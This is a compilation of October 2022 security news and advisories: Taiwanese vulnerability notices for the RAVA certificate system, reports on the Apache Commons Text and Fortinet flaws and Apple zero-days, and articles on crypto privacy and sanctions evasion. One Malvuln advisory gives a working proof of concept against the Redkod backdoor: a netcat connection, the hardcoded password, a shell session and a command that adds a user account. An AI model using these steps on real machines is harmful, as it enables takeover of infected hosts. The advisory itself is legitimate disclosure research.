RAVA certification validation system has a path traversal vulnerability. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and access arbitrary system files.

:::

*   首頁
*   資安服務
*   台灣漏洞揭露平台 (TVN)
*   TVN (Taiwan Vulnerability Note) 漏洞公告

TVN ID

TVN-202209014

CVE ID

CVE-2022-39058

CVSS

7.5 (High)  
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

影響產品

全景軟體 RAVA憑證驗證系統網站 v3

問題描述

RAVA憑證驗證系統網站特定頁面參數存在Path Traversal漏洞，遠端攻擊者不須權限，即可利用此漏洞繞過身分認證機制，存取任意系統檔案。

解決方法

請與全景軟體聯繫提供修補方案

漏洞通報者

Vickey Tsai蔡馨儀 (Acer Cyber Security Inc., ACSI)

公開日期

2022-10-18

CVE-2022-39058: 全景軟體 RAVA憑證驗證系統網站 - Path Traversal

RAVA certificate validation system has insufficient filtering for special parameter of the web page input field. A remote attacker with administrator privilege can exploit this vulnerability to perform arbitrary system command and disrupt service.

:::

*   首頁
*   資安服務
*   台灣漏洞揭露平台 (TVN)
*   TVN (Taiwan Vulnerability Note) 漏洞公告

TVN ID

TVN-202209013

CVE ID

CVE-2022-39057

CVSS

7.2 (High)  
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

影響產品

全景軟體 RAVA憑證驗證系統網站 v3

問題描述

RAVA憑證驗證系統網站特定頁面欄位未對特殊參數作過濾，遠端攻擊者以管理者權限登入後，即可利用此漏洞進行Command Injection攻擊，執行系統任意指令，並對系統進行任意操作或中斷服務。

解決方法

請與全景軟體聯繫提供修補方案

漏洞通報者

Amos Tsai蔡啟仁 (Acer Cyber Security Inc., ACSI)

公開日期

2022-10-18

CVE-2022-39057: 全景軟體 RAVA憑證驗證系統網站 - Command Injection

RAVA certificate validation system has insufficient validation for user input. An unauthenticated remote attacker can inject arbitrary SQL command to access, modify and delete database.

:::

*   首頁
*   資安服務
*   台灣漏洞揭露平台 (TVN)
*   TVN (Taiwan Vulnerability Note) 漏洞公告

TVN ID

TVN-202209012

CVE ID

CVE-2022-39056

CVSS

9.8 (Critical)  
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

影響產品

全景軟體 RAVA憑證驗證系統網站 v3

問題描述

RAVA憑證驗證系統網站特定功能參數未對使用者輸入進行驗證，遠端攻擊者不須權限，即可注入任意SQL語法讀取、修改及刪除資料庫。

解決方法

請與全景軟體聯繫提供修補方案

漏洞通報者

Amos Tsai蔡啟仁 (Acer Cyber Security Inc., ACSI)

公開日期

2022-10-18

CVE-2022-39056: 全景軟體 RAVA憑證驗證系統網站 - SQL Injection

RAVA certificate validation system has inadequate filtering for URL parameter. An unauthenticated remote attacker can perform SSRF attack to discover internal network topology base on query response.

:::

*   首頁
*   資安服務
*   台灣漏洞揭露平台 (TVN)
*   TVN (Taiwan Vulnerability Note) 漏洞公告

TVN ID

TVN-202209011

CVE ID

CVE-2022-39055

CVSS

5.3 (Medium)  
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

影響產品

全景軟體 RAVA憑證驗證系統網站 v3

問題描述

RAVA憑證驗證系統網站特定URL參數未作恰當的過濾，遠端攻擊者不須權限，即可進行SSRF攻擊，透過回傳的錯誤訊息判斷目標網址狀態，藉以探測內網狀態。

解決方法

請與全景軟體聯繫提供修補方案

漏洞通報者

Jay Wu吳瑋杰 (Acer Cyber Security Inc., ACSI)

公開日期

2022-10-18

CVE-2022-39055: 全景軟體 RAVA憑證驗證系統網站 - Server-Side Request Forgery (SSRF)

There's nothing yet to suggest CVE-2022-42889 is the next Log4j. But proof-of-concept code is available, and interest appears to be ticking up.

Researchers are closely tracking a critical, newly disclosed vulnerability in Apache Commons Text that gives unauthenticated attackers a way to execute code remotely on servers running applications with the affected component.

The flaw (CVE-2022-42889) has been assigned a severity ranking of 9.8 out of a possible 10.0 on the CVSS scale and exists in versions 1.5 through 1.9 of Apache Commons Text. Proof-of-concept code for the vulnerability is already available, though so far there has been no sign of exploit activity.

**Updated Version Available**

The Apache Software Foundation (ASF) released an updated version of the software (Apache Commons Text 1.10.0) on September 24 but issued an advisory on the flaw only last Thursday. In it, the Foundation described the flaw as stemming from insecure defaults when Apache Commons Text performs variable interpolation, which basically is the process of looking up and evaluating string values in code that contain placeholders. "Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers," the advisory said.

NIST, meanwhile, urged users to upgrade to Apache Commons Text 1.10.0, which it said, "disables the problematic interpolators by default."

The ASF Apache describes the Commons Text library as providing additions to the standard Java Development Kit's (JDK) text handling. Some 2,588 projects currently use the library, including some major ones such as Apache Hadoop Common, Spark Project Core, Apache Velocity, and Apache Commons Configuration, according to data in the Maven Central Java repository.

In an advisory today, GitHub Security Lab said it was one of its pen testers that had discovered the bug and reported it to the security team at ASF in March.

Researchers tracking the bug so far have been cautious in their assessment of its potential impact. Noted security researcher Kevin Beaumont wondered in a tweet on Monday if the vulnerability could result in a potential Log4shell situation, referring to the infamous Log4j vulnerability from late last year.

"Apache Commons Text supports functions that allow code execution, in potentially user supplied text strings," Beaumont said. But in order to exploit it, an attacker would need to find Web applications using this function that also accept user input, he said. "I won't be opening up MSPaint yet, unless anybody can find webapps that use this function and allow user supplied input to reach it," he tweeted.

**Proof-of-Concept Exacerbates Concerns**

Researchers from threat intelligence firm GreyNoise told Dark Reading the company was aware of PoC for CVE-2022-42889 becoming available. According to them, the new vulnerability is nearly identical to one ASF announced in July 2022 that also was associated with variable interpolation in Commons Text. That vulnerability (CVE-2022-33980) was found in Apache Commons Configuration and had the same severity rating as the new flaw.

"We are aware of Proof-Of-Concept code for CVE-2022-42889 that can trigger the vulnerability in an intentionally vulnerable and controlled environment," GreyNoise researchers say. "We are not aware of any examples of widely deployed real-world applications utilizing the Apache Commons Text library in a vulnerable configuration that would allow attackers to exploit the vulnerability with user-controlled data."

GreyNoise is continuing to monitor for any evidence of "proof-in-practice" exploit activity, they added.

Jfrog Security said it is monitoring the bug and so far, it appears likely that the impact will be less widespread than Log4j. "New CVE-2022-42889 in Apache Commons Text looks dangerous," JFrog said in a tweet. "Seems to only affect apps that pass attacker-controlled strings to-StringLookupFactory.INSTANCE.interpolatorStringLookup().lookup()," it said.

The security vendor said people using Java version 15 and later should be safe from code execution since script interpolation won't work. But other potential vectors for exploiting the flaw — via DNS and URL — would still work, it noted.

Researchers Keep a Wary Eye on Critical New Vulnerability in Apache Commons Text

Backdoor.Win32.Redkod.d malware suffers from a hardcoded credential vulnerability.

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022  
Original source: https://malvuln.com/advisory/bb309bdd071d5733efefe940a89fcbe8.txt  
Contact: malvuln13@gmail.com  
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Redkod.d  
Vulnerability: Weak Hardcoded Credentials   
Description: The malware listens on TCP port 4820. Authentication is required, however the password "redkod" is weak and hardcoded in cleartext within the PE file.  
Family: Redkod  
Type: PE32  
MD5: bb309bdd071d5733efefe940a89fcbe8  
Vuln ID: MVID-2022-0649  
Disclosure: 10/16/2022

Exploit/PoC:  
C:\>nc64.exe x.x.x.x 4820  
===========================================================  
=                   RedKod Backdoor 1.0                   =  
=                        By R-e-D                         =  
=                  http://www.redkod.com                  =  
=                     r-e-d@redkod.com                    =  
===========================================================

Password: redkod

RBackdoor# exec calc  
msg: Execution effectuee avec succes

RBackdoor# setpass malvuln

RBackdoor# help  
COMMAND HELP:

 > Shell Commands :

CD          Permet de changer de repertoire courant  
CLEAR       Efface le buffer de la console  
COPY        Permet de copier un fichier  
DEL         Permet d'effacer un ou plusieurs fichier  
DIR         Permet de lister le contenu d'un repertoire  
FIND        Recherche un fichier a travers le path  
HELP        Affiche cette aide  
LS          Permet de lister le contenu d'un repertoire  
MD          Permet de creer un repertoire  
MOVE        Permet de deplacer un fichier ou un repertoire  
REN         Permet de renommer un fichier  
PWD         Permet de recuperer le repertoire courant  
RMDIR       Permet d'effacer un repertoire  
SHELL       Permet d'executer toute commande DOS sur le systeme cible

 > Informations Commands :

CLIP        Permet de recuperer le contenu du presse papier  
DISKINFO    Permet de recuperer des informations sur les disques durs  
GETGROUPS   Permet de recuperer des informations sur les groupes, les users, les            SID :)  
GETPROCESS  Recupere et affiche la liste des processus actifs  
GETSERVICES Permet d'afficher les services NT presents sur une machine local ou             distante  
LISTEVENT   Permet de lister les journaux du eventlog  
NETSHARE    Permer d'afficher les ressources partager de la machine local ou d'u            ne machine distante  
ENUMSERVER  Permet d'afficher les servers appartenant au domaine  
SYSINFO     Permet de recuperer des informations sur le systeme cible  
TIME        Affiche l'heure et la date du systeme distant  
UPTIME      Permet d'afficher depuis combien de temps le systeme fonctionne  
USERINFO    Permet d'obtenir des informations sur un utilisateur  
VERSION     Affiche la version de RBackdoor  
WHOAMI      Permet de recuperer l'utilisateur logge sur la machine

 > Interactions Commands :

ADDEVENT    Permet d'ajouter un evenement dans l'eventlog  
ADDSHARE    Permet d'ajouter une ressource partagee  
BEEP        Fait beeper le haut parleur interne  
CLEARLOG    Permet d'effacer un journal complet de l'eventlog  
DELSERVICE  Permet de supprimer un service present  
DELSHARE    Permet de retirer une ressource partagee  
EXEC        Permet d'executer une commande sur le systeme cible  
HEXEC       Permet d'executer une commande tout en cachant sa sortie  
LOGOFF      Permet de fermer la session de l'utilisateur courant  
KILLPROCESS Permet de killer un processus  
MOUSE       Permet de placer le curseur de la souris au coordonnees x et y                  voulues  
MSGBOX      Permet d'envoyer une boite de dialogue au systeme cible avec message            personalise  
RCHAT       Permet d'etablir une communication ecrite avec une personne etant pr            esent sur le pc distant  
REBOOT      Permet de redemarrer la machine  
SCREENSHOT  Permet de prendre un screenshot du bureau de la machine distante  
SENDKEY     Permet d'emuler la pression d'une touche du clavier  
SETNAME     Change le nom NetBios du serveur  
STARTSERVICE Permet de demarrer un servive present sur la machine serveur  
STOPSERVICE Permet de stopper un service present et demarrer

 > Administration of RBackdoor Commands :

EXIT        Permet de fermer la connection a la backdoor tout en laissant                   la backdoor active  
KILL        Permet de desactiver ou de reactiver la backdoor  
OPEN        Creer un nouveau processus de RBackdoor sur un autre port  
SETPASS     Permet de modifier le pass associe a la backdoor

 > RBackdoor Tools :

FGET        Permet de recuperer un fichier sur un serveur FTP  
FPUT        Permet d'uploader un fichier sur un serveur FTP  
MAIL        Permet d'envoyer un mail, etc...  
NETPATCH    Rootkit permettant de patcher netstat.exe pour cacher RBackdoor  
RCRYPT      Permet de crypter ou de decrypter un fichier  
RPATCH      Permet de patcher le systeme pour effacer rbackdoor  
RSHELL      Permet de lancer un vrai shell DOS  
SCAN        Permet de scanner les ports d'une hote distante  
TELNET      Permet de se connecter a une hote distante (TCP Protocol Only)  
VIEW        Permet de lire le contenu d'un fichier  
WGET        Recupere et d'affiche le contenu d'un fichier heberge sur un serveur            http  
WRITE       Permet d'ecrire directement dans un fichier

msg: Tapez help <command> pour des informations plus precises sur la commande voulue

RBackdoor# rshell  
                                 ATTENTION!!  
Pour fermer le shell veuillez tapez 'exit'! Sinon perte de la backdoor envisageable !

Microsoft Windows [Version 10.0.16299.309]  
(c) 2017 Microsoft Corporation. All rights reserved.

C:\dump>whoami  
whoami  
desktop-2c4jqho\victim

C:\dump>net user hyp3rlinx 666 /add  
net user hyp3rlinx 666 /add  
The command completed successfully.

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Redkod.d MVID-2022-0649 Hardcoded Credential

The authentication bypass flaw in FortiOS, FortiProxy and FortiSwitchManager is easy to find and exploit, security experts say.

Concerns over a critical authentication bypass vulnerability in certain Fortinet appliances heightened this week with the release of proof-of-concept (PoC) exploit code and a big uptick in vulnerability scans for the flaw.

The bug (CVE-2022-40684) is present in multiple versions of Fortinet's FortiOS, FortiProxy and FortiSwitchManager technologies. It allows an unauthenticated attacker to gain administrative access to affected products via specially crafted HTTPS and HTTP requests, and potentially use that as entry point to the rest of the network.

Bharat Jogi, director of vulnerability threat research at Qualys says researchers at the company have observed mass scans being carried out by various threat actors to identify Internet facing vulnerable systems for compromise.

"They are compromising these systems to create a super\_admin user which provides them with complete access and control," Jogi says. "Once this level of access is achieved, they have the ability to delete any trace of their successful exploitation attempt, making it difficult for organizations to track compromised assets in their environment."

If this flaw is successfully exploited, an attacker would have complete access to the organization's internal systems that were previously protected by Fortinet's firewalls, he says. "Having a compromised firewall is like laying out a red carpet for threat actors to stroll right into your organization's environment," Jogi notes.

**Added to CISA's Known Exploited Vulnerabilities Catalog**

The US Cybersecurity and Infrastructure Security Agency (CISA) earlier this week added the vulnerability to its Known Exploited Vulnerabilities catalog. Federal executive branch agencies—which are required to remediate vulnerabilities in the catalog within specific deadlines—have until Nov. 1 to address it. Though the deadline applies only to federal agencies, security experts have previously noted how it is a good idea for all organizations to monitor the vulnerabilities in the catalog and follow CISA's deadline for implementing fixes.

Fortinet privately notified customers of the affected products about the vulnerability last Friday, along with instructions to immediately update to patched versions of the technology the company had just released. It advised companies that could not update for any reason to immediately disable Internet-facing HTTPS administration until they could upgrade to the patched versions. 

"Due to the ability to exploit this issue remotely, Fortinet is strongly recommending all customers with the vulnerable versions to perform an immediate upgrade," Fortinet said in its private notification, a copy of which was posted on Twitter the same day.

Fortinet followed up with a public vulnerability advisory on Monday describing the flaw and warning customers of potential exploit activity. The company said it was aware of instances where attackers had exploited the vulnerability to download the configuration file from affected systems and to add a malicious super\_admin account called "fortigate-tech-support".

Since then, penetration testing from Horizon3.ai has released proof-of-concept code for exploiting the vulnerability along with a technical deep dive of the flaw. A template for scanning for the vulnerability has also become available on GitHub.

Exacerbating the concerns is the relatively low bar for exploiting the flaw. "This vulnerability is extremely easy for an attacker to exploit. All that is required is access to the management interface on a vulnerable system," Zach Hanley, chief attack engineer at Horizon3.ai, tells Dark Reading

**Increase in Scanning Activity for the Flaw**

Qualys isn't the only company observing increased vulnerability scanning for the flaw. James Horseman, exploit developer at Horizon3.ai says public data from GreyNoise—which tracks Internet scanning activity hitting security tools—shows the number of unique IPs using the exploit has grown from the single digits a few days ago, to over forty as of Oct. 14.

"We expect the number of unique IPs using this exploit to rapidly increase in the coming days," Horseman says. It is not hard for attackers to find vulnerable systems, he adds: A Shodan search for instance shows more than 100,000 Fortinet systems worldwide. 

"Not all of these will be vulnerable, but a large percentage will be," Horseman says.

Johannes Ullrich, dean of research at the SANS Institute, says he has observed scans associated with an older FortiGate vulnerability (CVE-2018-13379,) hitting SANS' honeypots in the days following disclosure of the new bug. He says there are two theories why that might be happening.

One of them is that an attacker may have tried to catch as many devices as possible that had not yet been patched for the old vulnerability. Given the attention the new vulnerability has gotten it is likely the old vulnerability will get patched as well now, he says.

"Or the attacker was trying to find Fortinet devices to exploit using the new vulnerability once it is available," he theorizes. "The old vulnerability scanner they had sitting on the shelf may still work to identify Fortinet devices."

**A Popular Attacker Target**

Concerns over vulnerabilities in Fortinet products are not new. The company's technologies—and those of others selling similar appliance—have been frequently targeted by attackers trying to gain an initial foothold on target network. 

Last November. The FBI, CISA and others issued an advisory warning of Iranian advanced persistent threat actors exploiting vulnerabilities in Fortinet and Microsoft products. A similar alert in April 2021 warned of attackers exploiting flaws in FortiOS to break into multiple government, commercial, and technology services.  

"These vulnerable devices are often edge devices, so an attacker could potentially use this vulnerability to gain access to an organization's internal networks to launch further attacks," Hanley says.

Fortinet itself has recommended that organizations that are able to, must update to the newly patched versions of FortiOS, FortiProxy and FortiSwitch Manager. For organizations that cannot immediately update, Fortinet has provided guidance on how to disable the HTTP/HTTPS interface or limit IP addresses that can reach the administrate interface of the affected products.

Hanley says organizations sometimes may not be able to patch due to the potential downtime associated with updating a device. "However, an organization should be able to apply \[the\] workaround to prevent this vulnerability from being exploited on unpatched machines by following Fortinet’s guidance."

Qualys' Jogi adds, "It is also crucial to review any attempts of exploit to identify systems that may have already been compromised. If an organization is unable to patch their systems, then they must disable the system admin interface immediately."

Concerns Over Fortinet Flaw Mount; PoC Released, Exploit Activity Grows

Such exploits sell for up to $10 million, making them the single most valuable commodity in the cybercrime underworld.

Over the past few years, there's been an increase in the number of attackers targeting Apple, especially with zero-day exploits. One major reason is that a zero-day exploit might just be the most valuable asset in a hacker's portfolio — and hackers know it. In 2022 alone, Apple has discovered seven zero-days and has followed up these discoveries with the required remedial updates. But it doesn't seem like the cat-and-mouse game will die anytime soon.

In 2021, the number of recorded zero-days overall was more than double the figures recorded in 2020, showing the highest level since tracking began in 2014, according to a repository maintained by Project Zero. MIT Technology Review attributed this rise to the "rapid global proliferation of hacking tools" and the willingness of powerful state and non-state groups to invest handsomely in the discovery and infiltration of these operating systems. Threat actors actively search for vulnerabilities, find a way to exploit them, then sell the information to the highest bidder.

**The Zero-Day Battles**

Suffering repeatedly from these infiltrations is the tech giant, Apple. After recovering from 12 recorded exploitations and remediation in 2021, Apple was welcomed into the new year of 2022 with two zero-day bugs in its operating systems and a WebKit flaw that could have leaked users' browsing data. Barely one month after releasing 23 security patches to fix those issues, another flaw was discovered — one that would allow attackers to infect users' devices when they process certain malicious Web content.

Fast-forward to August 17 and Apple revealed it had found two new vulnerabilities in its operating system: CVE-2022-32893 and CVE-2022-32894. The first vulnerability gives remote code execution (RCE) access to Apple's Safari Web browser kit, used by every iOS and macOS-enabled browser. The second, another RCE flaw, gives attackers complete and unrestricted access to the user's software and hardware. Both vulnerabilities affect most Apple devices — especially the iPhone 6 and later models, iPad Pro, iPad Air 2 onwards, iPad 5th generation and newer models, iPad mini 4 and newer versions, iPod touch (7th generation), and macOS Monterrey. Recognizing the risk level of such a threat, Apple recently released security updates to remediate these "actively exploited" vulnerabilities. This would be the fifth and sixth zero-day vulnerability exploited in Apple's systems just this year.

A couple weeks later, speculations about another zero-day exploit arose. One research team, in particular, said it found an ad on the Dark Web offering a supposedly weaponized version of an Apple vulnerability for over €2 million. While these speculations remain unconfirmed, soon after Apple released security updates for its seventh actively exploited zero-day vulnerability of 2022: CVE-2022-32917. According to the advisory, attackers could leverage this flaw to create applications that execute arbitrary code with kernel capabilities.

Zero-day exploits sell for up to $10 million, Digital Shadows' Photon Research Team reports, positioning them as the single most expensive commodity in the cybercrime underworld. With a bounty like that, the market for these exploits are bound to expand and further exacerbate cyber threats.

**Apple Isn't Alone in the Zero-Day Wild**

Apple is not alone in this struggle. In recent months, tech giants like Microsoft, Adobe, and Google have also had to patch zero-day vulnerabilities that have been actively exploited in the deep Web. A June article on Dark Reading noted that there had been "a total of 18 security vulnerabilities exploited as unpatched zero-days in the wild," and the number has since risen to 24. From all indications, attackers won't slow down anytime soon, especially as new variants of already patched zero days continue to surface.

As adversaries continue to find loopholes across systems and security architectures, enterprise leaders must keep prioritizing proactive defenses to stay ahead of attacks. One way to be proactive, according to Craig Harber, CTO at Fidelis Cybersecurity, is for organizations to map cyber terrains by gaining full visibility into their entire systems.

"Discovery is a ballet of strategy, inventory, and evaluation. Organizations need the ability to continuously discover, classify, and assess assets — including servers, enterprise IoT, laptops, desktops, shadow IT, and legacy systems," he notes.

Apple's Constant Battles Against Zero-Day Exploits

By releasing half a million users’ transactions in a bankruptcy court filing, the company has opened a vast breach in its users’ financial privacy.

The paradoxical nature of cryptocurrency's privacy is that the blockchain, that unchangeable ledger of all a cryptocurrency's transactions, serves as both a map and a mask: Bitcoin are easy enough to follow from one address to the next. But only a few entities, like the cryptocurrency exchanges that allow users to trade their crypto for traditional currency, are able to match the inscrutable strings of numbers and letters in those addresses to real-world identities. So when one of those exchanges suddenly dumps a massive internal user database online, they haven't just spilled their own data. They've offered a key to decipher a vastly larger set of financial secrets.

That's what happened last week when Celsius, a cryptocurrency exchange facing bankruptcy, leaked an enormous collection of its users' transaction data through an unusual sort of privacy breach: a court filing. As part of its bankruptcy proceedings—in which the company's owners are accused of pulling tens of millions of dollars worth of crypto out of the exchange before revealing its insolvency—the company's attorneys released a document that appears to include the transaction data of half a million of its users from April of this year until it ceased trading in June. That database was briefly posted as a 14,500-page PDF to the court records website PACER before being taken down—but not before Gizmodo copied it to the Internet Archive, where it was widely downloaded before being removed there, too.

The data dump includes the names and transaction details of Celsius' users along with the dates and amounts of each payment. The database doesn't include the cryptocurrency addresses that directly identify senders and recipients on cryptocurrencies' blockchains, but the unique payment amounts, detailed down to more than a dozen decimal places of precision in many cases, nonetheless make it possible to match the payments to blockchains' records.

All of that means that the Celsius leak offers a rare gift to both professional and amateur cryptocurrency tracers, allowing them to not only see Celsius users' transactions, but also identify and trace those users' funds across the blockchains. That could potentially open new possibilities to identify scammers, hackers, or any other illicit users who might have exploited Celsius as a cash-out service for ill-gotten coins. But it also opens Celsius' users to exploitation by any rip-off artist or thief who combs through the data, connects it to other accounts, and identifies their cryptocurrency holdings as a ripe target.

"This is really one of the worst exchange data breaches since Mt. Gox," says Nick Bax, head of research at security consultancy and asset recovery firm Convex Labs. But even as he compares the Celsius leak to the disastrous breach of the early Bitcoin exchange Mt. Gox, which was bankrupted by hackers in 2014 and had its transaction database leaked online, he also calls it a "dream come true for analysts" focused on cryptocurrency tracing.

“You can find someone’s balance, deposits, and withdrawals and then correlate all that to the blockchain,” Bax says. “We can use it for good, but it can absolutely be misused too. Criminals are going through this right now, looking for whoever has the biggest balances.” Once they’re identified, Bax warns, those wealthy crypto holders could be targeted with spear-phishing, scams, and even physical extortion.

Cryptocurrency tracers in law enforcement, government regulators, and private firms are no doubt already following flows of funds to and from Celsius, scouring it for leads in their own research. "This is data we'll ingest, analyze, and have available as part of our investigations, and I suspect others will too," says Matt Edman, cofounder of the security startup Naxo. Edman previously worked as an FBI contractor at the Mitre Corporation, where he helped trace cryptocurrency in the criminal case of Ross Ulbricht, the creator of the Silk Road dark web market.

"When it comes to cryptocurrency tracing, following the flow of funds is not really the hard part," Edman adds. "The tricky part in those investigations is the attribution—associating an address or transaction with an individual. That's where datasets like this are key."

Celsius didn't respond to WIRED's request for comment.

In just the days following Celsius' disclosure of the database in court records, internet sleuths have already begun posting findings from the data. One well-known independent cryptocurrency tracer, who goes by the Twitter handle ZachXBT, posted evidence from the leak that a Celsius user and influencer named Lark Davis had promoted Celsius after pulling his own $2.5 million worth of crypto out of the exchange. (Davis didn't immediately respond to WIRED's request for comment.) The website Celsiusnetworth.com already claims to allow anyone to search the data for individuals' holdings at the exchange.

Meanwhile, a cryptocurrency tracer and developer for decentralized finance firm Viper Labs, who goes by the name Federico Notte, converted the PDF from Celsius' court filing into a spreadsheet and posted a link to his public Twitter account. He tells WIRED he hopes to use the database in combination with blockchain analysis to figure out the transactions of major trading funds, in hopes of learning their tactics. "It's something you can definitely do," says Notte. "It's also a major privacy concern for these people, too."

But even as legitimate analysts and investigators dig into the data, some cryptocurrency tracers emphasize that it will be of far more value to criminals. "The amount of private information is quite scary, really," says Thibaud Madelin, who leads research at cryptocurrency-tracing firm Elliptic. "Scammers will be scouting this list, and they’ll know how much people have spent, how much they’ve lost, how much they hope to make back."

"They’re ruthless," Madelin adds, referring to scammers. "And this will give them thousands of opportunities."

Celsius Exchange Data Dump Is a Gift to Crypto Sleuths—and Thieves

Blockchain investigators have uncovered at least $4 million—and counting—in cryptocurrency fundraising has reached Russia's violent militia groups.

As Russian troops have flooded into Ukraine’s borders for the past eight months—and with an ongoing mobilization of hundreds of thousands more underway—the Western world has taken drastic measures to cut the economic ties that fuel Russia’s invasion and occupation. But even as those global sanctions have carefully excised Russia from global commerce, millions of dollars have continued to flow directly to Russian military and paramilitary groups in a form that’s proven harder to control: cryptocurrency.

Since Russia launched its full-blown invasion of Ukraine in February, at least $4 million worth of cryptocurrency has been collected by groups supporting Russia’s military in Ukraine, researchers have found. According to analyses by cryptocurrency-tracing firms Chainalysis, Elliptic, and TRM Labs, as well as investigators at Binance, the world’s largest cryptocurrency exchange, recipients include paramilitary groups offering ammunition and equipment, military contractors, and weapons manufacturers. That flow of funds, often to officially sanctioned groups, shows no sign of abating and may even be accelerating: Chainalysis traced roughly $1.8 million in funding to the Russian military groups in just the past two months, nearly matching the $2.2 million it found the groups received in the five months prior. And despite the ability to trace those funds, freezing or blocking them has proven difficult, due largely to unregulated or sanctioned cryptocurrency exchanges—most of them based in Russia—cashing out millions in donations earmarked for invaders.

“Our aim is to identify all the crypto wallets being used by Russian military groups and the people helping them; to find, seize and block all this activity that is helping to buy the bullets, the ammunition of this occupation,” says Serhii Kropyva, who until recently served as deputy of Ukraine’s Cyber Police and advisor to the country’s prosecutor general. “With the close cooperation of companies like Chainalysis and Binance, we can see all the wallets involved in this criminal activity, these money flows of millions of dollars. But we can, unfortunately, see that the transfer is continuing all the time.”

In separate reports, the cryptocurrency-tracing firms and Binance’s investigations team each tracked donations to the Russian war effort that very often began with public posts on the messaging app Telegram soliciting crowdfunded donations. Chainalysis, for instance, found Telegram posts from organizations including the pro-Russian media sites Rybar and Southfront, as well as the paramilitary group Rusich—which has ties to the notorious Wagner mercenary group—all posting cryptocurrency donation addresses to Telegram. These posts told followers that the money raised there would be used for everything from weaponized drones to radios, rifle accessories, and body armor. In another instance, Chainalysis points to a fundraiser by a group called Project Terricon that attempted to auction NFTs to support pro-Russian militia groups in Eastern Ukraine, though the NFTs were removed from the marketplace they were hosted on before any bids were placed.

Binance’s investigations team, in its own report, found that a total of $4.2 million in crypto had been funneled to Russian military groups since February. The groups named in its research didn’t entirely overlap with those named in Chainalysis’ report, suggesting that the overall funding could be far greater than either Binance’s or Chainalysis’ total. Binance, for instance, points to a pro-Russian “cultural heritage” group known as MOO Veche that has carried out fundraisers for military equipment similar to the kinds funded by the groups Chainalysis flagged. While Binance, TRM Labs, and Elliptic all name MOO Veche as a major fundraiser, Elliptic traced $1.7 million in crypto donations to the group, far more than the other researchers.

A screenshot of a Russian-language Telegram post from the pro-Russian military MOO Veche group, describing equipment paid for with its fundraising, including “thermal imagers, binoculars with rangefinders, spotting scopes, car radios, collimators and first aid kits.“

Telegram via Andy Greenberg

Other organizations that Binance spotted raising money through cryptocurrency crowdfunding on Telegram include the pro-Russian nationalist groups Save Donbas and REAR, as well as the Russian arms manufacturer Lobaev, which it saw directly soliciting donations on the platform. Yet another group, known as Romanov Light, whose fundraising was spotted by TRM Labs and Elliptic, claimed to be collecting crypto for Russian special forces. Romanov Light raised as much as $330,000 worth of donations, according to Elliptic, which it told donors it spent on military equipment like weapon accessories, flashlights, and armor plates.

Despite the relative clarity of all that financial tracing, preventing cryptocurrency from continuing to bolster Russia’s unprovoked incursion into Ukraine hasn’t been simple. Exchanges can block or freeze funds at the points where they’re exchanged for traditional currency. But according to Chainalysis, the majority of the crypto funds the groups have raised have been cashed out through Russian exchanges, including Chatex, Suex, and Garantex—all of which have already been targeted with Western sanctions for their extensive use by criminals. Chatex and Garantex did not respond to WIRED’s request for comment. Suex no longer appears to have a public website, and no contact information for the exchange could be found.

Not every exchange that has served as an ATM for Russian military crypto crowdfunding is hosted in Russia, however. Blockchain analysts who spoke to WIRED pointed to seven other exchange services, some hosted in India and China, that have received funds from the pro-Russian groups they tracked, though they declined to name them on the record, in part because the amounts of those funds in most cases were in the single-digit thousands or less.

In one telling example of how hard it is to prevent these cash-outs, however, analysts saw MOO Veche send more than $150,000 worth of bitcoin to an exchange hosted on the infrastructure of the Chinese cryptocurrency exchange Huobi—a “nested” exchange that essentially uses Huobi as its trading platform. But any responsibility that Huobi might have for blocking or freezing those funds was complicated by another unknown intermediary service that analysts saw the money travel through before entering the Huobi-hosted service. When WIRED reached out to Huobi for comment, it wrote in a statement that it has a “know-your-customer” process “which ensures to the best of our ability that our clients’ source of funds are above board.”

Binance, for its part, says its exchange accounts were also used by four of the groups it tracked and received more than $208,000 worth of cryptocurrencies. It tells WIRED that it froze all four accounts it discovered. “We’re making sure that no harm comes to civilians as a result of the fundraising that happens in these extremist spaces,” says Jennifer Hicks, who manages Binance’s intelligence and investigations team. “When cryptocurrency exchanges know that something illicit is happening that will end in real-world, kinetic effects like this, it’s the exchange’s responsibility to put a stop to it as fast as possible.”

Even when exchanges do monitor for crypto sent from sanctioned groups like these pro-Russian fundraisers, that dirty money won’t always be straightforward to detect, warns Thibaud Madelin, who leads research at Elliptic. He says he’s increasingly seeing Russian sources of illicit funds use “bridges” or “coin swaps”—services that allow easy trading of one cryptocurrency for another, often without offering any identifying information—as money-laundering techniques. He’s watched those tools grow in popularity among dark-web black markets and cybercriminal users and expects the same will happen with those seeking to launder illicit arms funding. “It’s a bit early to say definitively. But what we’re seeing is that it’s likely to become a bigger problem,” says Madelin. “They’re likely to mirror the methodologies seen across dark net services users, enabling large-scale money laundering and potentially sanctions evasion.”

An image in Chainalysis’s report pulled from a pro-Russian social media fundraiser that shows items funded through cryptocurrency donations, including targeting equipment, drone components, and satellite radios.

Courtesy of Chainanalysis

